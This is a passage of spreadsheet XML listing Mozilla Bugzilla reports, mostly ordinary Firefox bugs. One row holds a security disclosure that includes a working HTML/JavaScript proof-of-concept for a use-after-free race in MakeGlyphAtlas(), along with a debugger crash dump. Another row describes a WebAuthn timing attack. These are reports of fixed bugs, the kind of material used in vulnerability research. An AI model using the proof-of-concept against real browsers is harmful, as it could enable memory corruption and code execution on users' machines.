      <c r="O5541" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5541" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q5541" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5541" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5541" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T5541" t="n">
        <v>1</v>
      </c>
      <c r="U5541" t="n">
        <v>0</v>
      </c>
      <c r="V5541" t="n">
        <v>46</v>
      </c>
      <c r="W5541" t="inlineStr">
        <is>
          <t>Firebug is using jsdIValue.getWrappedValue() API to get list of of local (closure) scope variables (names and values).
To get list of a scope properties, Firebug is using:
var listValue = {value: null}, lengthValue = {value: 0};
jsdIStackFrame frame.scope.getProperties(listValue, lengthValue);
It works on Windows, but in Ubuntu - applying getWrappedValue() on returned properties (prop.name and prop.value), returns a number instead of a name or a value.
Here is the related code in Firebug SVN:
http://code.google.com/p/fbug/source/browse/branches/firebug1.9/content/firebug/lib/wrapper.js#73
STR:
1) Install Firebug e.g. from here: http://code.google.com/p/fbug/issues/detail?id=5058#c4
2) Load http://getfirebug.com/tests/content/branches/1.9/script/watch/5019/issue5019.html
3) Follow steps on the test page.
The Watch side panel properly displays local variables a, b, c and their values in Windows, but in Ubuntu I am seeing something like: -4.428469523771077e-75, 2.12199573e-314, etc. (looks like a reference/address instead of an actual value)
Tested with Firefox Nightly:
Built from http://hg.mozilla.org/mozilla-central/rev/2afd7ae68e8b
Honza</t>
        </is>
      </c>
      <c r="X5541" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5542">
      <c r="A5542" t="n">
        <v>1368016</v>
      </c>
      <c r="B5542" t="inlineStr">
        <is>
          <t>2017-05-26 03:39:21 -0700</t>
        </is>
      </c>
      <c r="C5542" t="inlineStr">
        <is>
          <t>Compact themes should stop messing with the back and forward buttons</t>
        </is>
      </c>
      <c r="D5542" t="inlineStr">
        <is>
          <t>2017-05-28 03:20:16 -0700</t>
        </is>
      </c>
      <c r="E5542" t="n">
        <v>1</v>
      </c>
      <c r="F5542" t="n">
        <v>1</v>
      </c>
      <c r="G5542" t="n">
        <v>2</v>
      </c>
      <c r="H5542" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5542" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5542" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5542" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5542" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5542" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5542" t="inlineStr">
        <is>
          <t>[photon-visual][p1][57]</t>
        </is>
      </c>
      <c r="Q5542" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5542" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5542" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5542" t="n">
        <v>1</v>
      </c>
      <c r="U5542" t="n">
        <v>0</v>
      </c>
      <c r="V5542" t="n">
        <v>6</v>
      </c>
      <c r="W5542" t="inlineStr">
        <is>
          <t>Since the compact (and touch) modes will be decoupled from "compact" themes, these themes should stop adjusting the back and forward buttons to be compact.</t>
        </is>
      </c>
      <c r="X5542" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5543">
      <c r="A5543" t="n">
        <v>1823365</v>
      </c>
      <c r="B5543" t="inlineStr">
        <is>
          <t>2023-03-20 03:20:10 -0700</t>
        </is>
      </c>
      <c r="C5543" t="inlineStr">
        <is>
          <t>initialization race leading to use after free in MakeGlyphAtlas()</t>
        </is>
      </c>
      <c r="D5543" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:11 -0700</t>
        </is>
      </c>
      <c r="E5543" t="n">
        <v>1</v>
      </c>
      <c r="F5543" t="n">
        <v>1</v>
      </c>
      <c r="G5543" t="n">
        <v>3</v>
      </c>
      <c r="H5543" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5543" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5543" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5543" t="inlineStr">
        <is>
          <t>Firefox 113</t>
        </is>
      </c>
      <c r="L5543" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5543" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5543" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5543" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5543" t="inlineStr">
        <is>
          <t>[adv-main112+]</t>
        </is>
      </c>
      <c r="Q5543" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5543" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5543" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T5543" t="n">
        <v>1</v>
      </c>
      <c r="U5543" t="n">
        <v>0</v>
      </c>
      <c r="V5543" t="n">
        <v>29</v>
      </c>
      <c r="W5543" t="inlineStr">
        <is>
          <t>Created attachment 9323897
UAF_MakeGlyphAtlas_PoC.html
VULNERABILITY DETAILS
	Specifically crafted HTML file can trigger Use After Free in GFX code `MakeGlyphAtlas()`. This bug can potentially be exploited to achieve one click Remote Code Execution in content process.
`gGlyphMask` is static variable in `gfxFontMissingGlyphs.cpp`, so it's intended to be initialized/constructed once only.
		static RefPtr&lt;SourceSurface&gt; gGlyphMask;
However, the code inside function MakeGlyphAtlas() in file gfxFontMissingGlyphs.cpp is subject to race condition.
```cpp
		static bool MakeGlyphAtlas(const DeviceColor&amp; aColor) {
		...
		  if (!gGlyphMask) {
			gGlyphMask = gGlyphDrawTarget-&gt;CreateSourceSurfaceFromData(
		...
		}	
```
When JS script like `ctx0.fillText("&amp;#9175;&amp;#9856;ïž&amp;cent;")` from the PoC is called from web worker. `MakeGlyphAtlas()` is executed in worker thread.
If two threads check `gGlyphMask` and `gGlyphMask` is null in both cases, then they both satisfy the if clause of  `if (!gGlyphMask)`, and try to call `CreateSourceSurfaceFromData()` to create a new `SourceSurfaceSkia` object and assign it as `RefPtr` to `gGlyphMask`. One thread executes  `CreateSourceSurfaceFromData()` sooner and creates an `SourceSurfaceSkia` object first. Then when the second thread executes `CreateSourceSurfaceFromData()` and try to assign the newly created second `SourceSurfaceSkia` object to `gGlyphMask`, `gGlyphMask` is not null (different from when it's being null check), so the assignment ("=") operation would release the firstly created `SourceSurfaceSkia` object. 
After that, when the first thread continues to execute the subsequent code, the operations against `gGlyphMask` are Use After Free:
```cpp
gGlyphDrawTarget-&gt;MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
							DrawOptions(1.0f, CompositionOp::OP_SOURCE));
```
VERSION
	Firefox	113.0a1 (2023-03-19) (64-bit)
	OS	Windows 11 Home 22H2 (Build 22621.1413)
REPRODUCTION CASE  (UAF_MakeGlyphAtlas_PoC.html)
```html	
&lt;script&gt;
	workers = [];
	workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
	workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&amp;#9175;&amp;#9856;ïž&amp;cent;",  47,15);}, 2);\n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&amp;#9175;&amp;#9856;ïž&amp;cent;",  47,15);}, 1);\n'
	for(var i = 0; i &lt; 10; i++)
	{
		var blob = new Blob([workerCode],{type: "text/javascript"});
		workers[i] = new Worker(window.URL.createObjectURL(blob));
	}
	setTimeout(function(){location.reload();},300); 
	&lt;/script&gt;
```
Type of crash: content process
Crash State: 
	(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
	xul!mozilla::gfx::GetSkImageForSurface+0x36:
	00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
	9:318&gt; r
	rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
	rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
	rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
	 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
	r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
	r14=000000ffebb7ac20 r15=000000ffebb7adc0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	xul!mozilla::gfx::GetSkImageForSurface+0x36:
	00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
	9:318&gt; dv
		   aSurface = 0x000002d6`3522d800
			  aLock = 0x000000ff`ebb7ac10 Nothing
			aBounds = &lt;value unavailable&gt;
			aMatrix = &lt;value unavailable&gt;
				map = struct mozilla::gfx::DataSourceSurface::MappedSurface
			 pixmap = class SkPixmap
			  image = class sk_sp&lt;SkImage&gt;
		dataSurface = &lt;value unavailable&gt;
		releaseProc = &lt;value unavailable&gt;
			   surf = &lt;value unavailable&gt;
	9:318&gt; k
	 # Child-SP          RetAddr           Call Site
	00 000000ff`ebb7aa50 00007ff9`d177638c xul!mozilla::gfx::GetSkImageForSurface+0x36 [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 246] 
	01 (Inline Function) --------`-------- xul!mozilla::gfx::ExtractAlphaForSurface+0xb [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 460] 
	02 000000ff`ebb7abd0 00007ff9`d18d527e xul!mozilla::gfx::DrawTargetSkia::MaskSurface+0x12c [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 1441] 
	03 (Inline Function) --------`-------- xul!MakeGlyphAtlas+0x1b1 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 112] 
	04 (Inline Function) --------`-------- xul!GetGlyphAtlas+0x222 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 131] 
	05 000000ff`ebb7ad70 00007ff9`d18c062a xul!gfxFontMissingGlyphs::DrawMissingGlyph+0x4fe [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 418] 
	06 000000ff`ebb7aef0 00007ff9`d0b29ef9 xul!gfxFont::DrawMissingGlyph+0x3ba [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2202] 
	07 (Inline Function) --------`-------- xul!gfxFont::DrawGlyphs+0x1be5 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2030] 
	08 000000ff`ebb7b050 00007ff9`d0a177b9 xul!gfxFont::Draw+0x2179 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2530] 
	09 (Inline Function) --------`-------- xul!gfxTextRun::DrawGlyphs+0x5c [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 429] 
	0a 000000ff`ebb7bb10 00007ff9`d22906e6 xul!gfxTextRun::Draw+0x4b9 [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 683] 
	0b 000000ff`ebb7cbf0 00007ff9`d2f4defc xul!mozilla::dom::CanvasBidiProcessor::DrawText+0x576 [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4124] 
	0c 000000ff`ebb7ce70 00007ff9`d2f4d8fd xul!nsBidiPresUtils::ProcessSimpleRun+0x11c [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2390] 
	0d 000000ff`ebb7cf80 00007ff9`d224b3cf xul!nsBidiPresUtils::ProcessText+0x1dd [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2165] 
	0e 000000ff`ebb7d140 00007ff9`d224a72a xul!mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText+0xc9f [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4448] 
	0f 000000ff`ebb7d400 00007ff9`d1c9c15a xul!mozilla::dom::CanvasRenderingContext2D::FillText+0x2a [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 3863] 
	10 000000ff`ebb7d440 00007ff9`d0831055 xul!mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText+0x2ea [/builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp @ 3904] 
	11 000000ff`ebb7d5a0 00007ff9`d0eb9e19 xul!mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt;+0x145 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3318] 
	12 (Inline Function) --------`-------- xul!CallJSNative+0x181 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 459] 
	13 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 553] 
	14 (Inline Function) --------`-------- xul!InternalCall+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
	15 (Inline Function) --------`-------- xul!js::CallFromStack+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 625] 
	16 000000ff`ebb7d660 00007ff9`d08a0a55 xul!Interpret+0xd479 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 3368] 
	17 (Inline Function) --------`-------- xul!js::RunScript+0x5c2 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 431] 
	18 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 585] 
	19 (Inline Function) --------`-------- xul!InternalCall+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
	1a 000000ff`ebb7db20 00007ff9`d094ab9f xul!js::Call+0x755 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 652] 
	1b 000000ff`ebb7dc30 00007ff9`cf260440 xul!JS::Call+0x2bf [/builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp @ 117] 
	1c 000000ff`ebb7dd60 00007ff9`cfba8d05 xul!mozilla::dom::Function::Call+0x1a0 [/builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp @ 50] 
	1d (Inline Function) --------`-------- xul!mozilla::dom::Function::Call+0x144 [/builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h @ 71] 
	1e 000000ff`ebb7dec0 00007ff9`d2b86376 xul!mozilla::dom::CallbackTimeoutHandler::Call+0x1c5 [/builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp @ 167] 
	1f 000000ff`ebb7e1a0 00007ff9`cf0da944 xul!mozilla::dom::WorkerPrivate::RunExpiredTimeouts+0x486 [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 5163] 
	20 000000ff`ebb7e330 00007ff9`cf782505 xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
	21 (Inline Function) --------`-------- xul!nsTimerImpl::Fire::&lt;lambda_2&gt;::operator()+0x1d [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 656] 
	22 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation&lt;unsigned char,1,nsCOMPtr&lt;nsITimerCallback&gt;,nsCOMPtr&lt;nsIObserver&gt;,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback&gt;::matchN+0x173 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 309] 
	23 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation&lt;unsigned char,0,nsTimerImpl::UnknownCallback,nsCOMPtr&lt;nsITimerCallback&gt;,nsCOMPtr&lt;nsIObserver&gt;,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback&gt;::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 318] 
	24 (Inline Function) --------`-------- xul!mozilla::Variant&lt;nsTimerImpl::UnknownCallback,nsCOMPtr&lt;nsITimerCallback&gt;,nsCOMPtr&lt;nsIObserver&gt;,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback&gt;::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 902] 
	25 (Inline Function) --------`-------- xul!mozilla::Variant&lt;nsTimerImpl::UnknownCallback,nsCOMPtr&lt;nsITimerCallback&gt;,nsCOMPtr&lt;nsIObserver&gt;,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback&gt;::match+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 857] 
	26 000000ff`ebb7e4d0 00007ff9`cf773b73 xul!nsTimerImpl::Fire+0x3a5 [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 654] 
	27 000000ff`ebb7e660 00007ff9`d2b8c62a xul!nsTimerEvent::Run+0x63 [/builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp @ 469] 
	28 000000ff`ebb7e840 00007ff9`cf0da944 xul!mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun+0x2a [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 201] 
	29 000000ff`ebb7e8a0 00007ff9`d07d9dce xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
	2a 000000ff`ebb7ea40 00007ff9`d07eeb9e xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
	2b 000000ff`ebb7ede0 00007ff9`cf0da19c xul!NS_ProcessNextEvent+0x3e [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
	2c 000000ff`ebb7ee30 00007ff9`cfeabbe2 xul!mozilla::dom::WorkerPrivate::DoRunLoop+0x1cc [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 3281] 
	2d 000000ff`ebb7ef30 00007ff9`d07d9dce xul!mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x2a2 [/builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp @ 2049] 
	2e 000000ff`ebb7f0c0 00007ff9`d07d8985 xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
	2f (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
	30 000000ff`ebb7f460 00007ff9`cf93340f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf5 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 
	31 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 381] 
	32 000000ff`ebb7f510 00007ff9`cef5fc7e xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 375] 
	33 000000ff`ebb7f560 00007ff9`cf775f03 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 357] 
	34 000000ff`ebb7f5c0 00007ffa`0ebc577c xul!nsThread::ThreadFunc+0xe3 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393] 
	35 000000ff`ebb7f780 00007ffa`0ec4a411 nss3!_PR_NativeRunThread+0x13c [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	36 000000ff`ebb7f800 00007ffa`5c849363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	37 000000ff`ebb7f830 00007ffa`5dc626bd ucrtbase!thread_start&lt;unsigned int (__cdecl*)(void *),1&gt;+0x93
	38 000000ff`ebb7f860 00007ffa`1f6251c8 KERNEL32!BaseThreadInitThunk+0x1d
	39 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook&lt;mozilla::interceptor::WindowsDllInterceptor&lt;mozilla::interceptor::VMSharingPolicyShared&gt;,void (*)(int, void *, void *)&gt;::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	3a 000000ff`ebb7f890 00007ffa`5ecca9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 592] 
	3b 000000ff`ebb7f900 00000000`00000000 ntdll!RtlUserThreadStart+0x28
	9:318&gt; dx -id 0,9 -r1 ((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)
	((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)                 : 0x2d63522d800 [Type: mozilla::gfx::SourceSurface *]
		[+0x008] mWeakRef         [Type: RefPtr&lt;mozilla::detail::ThreadSafeWeakReference&gt;]
		[+0x010] mUserData        [Type: mozilla::gfx::ThreadSafeUserData]
	9:318&gt; dx -id 0,9 -r1 (*((xul!RefPtr&lt;mozilla::detail::ThreadSafeWeakReference&gt; *)0x2d63522d808))
	(*((xul!RefPtr&lt;mozilla::detail::ThreadSafeWeakReference&gt; *)0x2d63522d808))                 [Type: RefPtr&lt;mozilla::detail::ThreadSafeWeakReference&gt;]
		[+0x000] mRawPtr          : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
	9:318&gt; dx -id 0,9 -r1 ((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)
	((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)                 : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
		[+0x000] mRefCnt          [Type: mozilla::detail::RC&lt;unsigned long long,0&gt;]
		[+0x008] mStrongCnt       [Type: mozilla::detail::RC&lt;unsigned long long,0&gt;]
		[+0x010] mPtr             : Unable to read memory at Address 0xe5e5e5e5e5e5e5f5
CREDIT INFORMATION
Reporter credit: Looben Yang</t>
        </is>
      </c>
      <c r="X5543" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5544">
      <c r="A5544" t="n">
        <v>1730434</v>
      </c>
      <c r="B5544" t="inlineStr">
        <is>
          <t>2021-09-12 18:37:13 -0700</t>
        </is>
      </c>
      <c r="C5544" t="inlineStr">
        <is>
          <t>FIDO2/WebAuthn privacy leak through a timing attack using silent authentications.</t>
        </is>
      </c>
      <c r="D5544" t="inlineStr">
        <is>
          <t>2023-01-25 09:21:45 -0800</t>
        </is>
      </c>
      <c r="E5544" t="n">
        <v>1</v>
      </c>
      <c r="F5544" t="n">
        <v>1</v>
      </c>
      <c r="G5544" t="n">
        <v>3</v>
      </c>
      <c r="H5544" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5544" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5544" t="inlineStr">
        <is>
          <t>DOM: Web Authentication</t>
        </is>
      </c>
      <c r="K5544" t="inlineStr">
        <is>
          <t>Firefox 92</t>
        </is>
      </c>
      <c r="L5544" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5544" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5544" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5544" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5544" t="inlineStr">
        <is>
          <t>[publication date Feb 2022][fingerprinting][post-critsmash-triage][adv-main101+][adv-esr91.10+]</t>
        </is>
      </c>
      <c r="Q5544" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5544" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5544" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T5544" t="n">
        <v>1</v>
      </c>
      <c r="U5544" t="n">
        <v>0</v>
      </c>
      <c r="V5544" t="n">
        <v>17</v>
      </c>
      <c r="W5544" t="inlineStr">
        <is>
          <t>Created attachment 9240831
firefox-report.pdf
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Steps to reproduce:
We identified a way to abuse WebAuthn/CTAP authentication that allows us to execute a timing attack which might lead to a serious privacy leak (e.g. account linking). The core of the issue are silent authentication calls (via CTAP) to authenticators. Silent authenticators are triggered when the allowCredentials list contains multiple key handles (credIDs). We tested a scenario where we compared the time response of invalid key handles (taken from different token) and key handles from the correct token but with a bad origin. The time difference is measurable and it increases with a bigger allowCredentials list (Please see recordings).
To reproduce the issue a specially crafted Relying Party is required (example in our source code)
https://drive.google.com/drive/folders/1pRGd8tZFFwOqF0iuDFaq1KymTmfHEWAM?usp=sharing
Actual results:
Time difference in execution of silent authentications.
We identified two existing FIDO2 hardware authenticators (HyperFido Titanium Pro and Feitian 26K) that are vulnerable to this attack. For example, for HyperFido token time difference is about 7s for 500 key handles in allowCredentials list.
Expected results:
We expected a defence mechanism preventing enumeration of allowCredential list.
Proposed solution: 
As firmware update on hardware authenticators is not possible, thus we propose to introduce limits on the number of allowed key handles in allowCredentials list on client side (Firefox). Example of such a mechanism can be found in Windows WebAuthn API.</t>
        </is>
      </c>
      <c r="X5544" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5545">
      <c r="A5545" t="n">
        <v>1545399</v>
      </c>
      <c r="B5545" t="inlineStr">
        <is>
          <t>2019-04-18 04:38:32 -0700</t>
        </is>
      </c>
      <c r="C5545" t="inlineStr">
        <is>
          <t>"An extension, [...], requires Container Tabs." text will hide itself after brief showing in General tab in Options after landing patch from bug #1534480</t>
        </is>
      </c>
      <c r="D5545" t="inlineStr">
        <is>
          <t>2019-05-21 01:54:05 -0700</t>
        </is>
      </c>
      <c r="E5545" t="n">
        <v>1</v>
      </c>
      <c r="F5545" t="n">
        <v>1</v>
      </c>
      <c r="G5545" t="n">
        <v>2</v>
      </c>
      <c r="H5545" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5545" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5545" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K5545" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L5545" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5545" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5545" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5545" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5545" t="inlineStr"/>
      <c r="Q5545" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5545" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5545" t="inlineStr">
        <is>
          <t>Firefox 68</t>
        </is>
      </c>
      <c r="T5545" t="n">
        <v>1</v>
      </c>
      <c r="U5545" t="n">
        <v>1</v>
      </c>
      <c r="V5545" t="n">
        <v>15</v>
      </c>
      <c r="W5545" t="inlineStr">
        <is>
          <t>Created attachment 9059244
bug.png
STR:
1. Install Cookie Autodelete extension ( https://addons.mozilla.org/addon/cookie-autodelete/ )
2. Open Firefox Options ( about:preferences )
3. Go to "General" tab ( about:preferences#general )
and see that "An extension, Cookie AutoDelete, requires Container Tabs." text will hide itself after brief showing
Regression caused by:
Commit message: bug #1534480 - Do not update Fluent DOM attributes if they match current ones. r=smaug
Differential Revision: https://phabricator.services.mozilla.com/D23063</t>
        </is>
      </c>
      <c r="X5545" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5546">
      <c r="A5546" t="n">
        <v>1100409</v>
      </c>
      <c r="B5546" t="inlineStr">
        <is>
          <t>2014-11-17 08:38:52 -0800</t>
        </is>
      </c>
      <c r="C5546" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::AudioParamTimeline::AudioNodeInputValue</t>
        </is>
      </c>
      <c r="D5546" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:36 -0700</t>
        </is>
      </c>
      <c r="E5546" t="n">
        <v>1</v>
      </c>
      <c r="F5546" t="n">
        <v>1</v>
      </c>
      <c r="G5546" t="n">
        <v>3</v>
      </c>
      <c r="H5546" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5546" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5546" t="inlineStr">
        <is>
